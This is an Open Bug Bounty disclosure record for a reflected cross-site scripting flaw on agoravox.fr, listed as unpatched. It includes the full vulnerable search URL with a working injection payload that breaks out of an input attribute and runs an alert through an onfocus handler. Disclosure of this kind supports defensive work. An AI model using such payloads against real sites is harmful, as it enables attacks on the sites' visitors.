agoravox.fr XSS vulnerability

2016-09-13T22:30:00
ID OBB:181558
Type openbugbounty
Reporter ghozt
Modified 2016-09-20T23:12:00

Description

Vulnerable URL:
http://www.agoravox.fr/?page=recherche&q;=%27%22+autofocus+onfocus%3Dalert%28%27OPENBUGBOUNTY%27%29+value%3D%22a&sb;=Rechercher
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 27.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 29740
VIP website status:| Yes
Check agoravox.fr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 September, 2016 22:30 GMT
Generic security notifications sent to website owner| 13 September, 2016 22:33 GMT
Vulnerability details disclosed by researcher| 20 September, 2016 23:12 GMT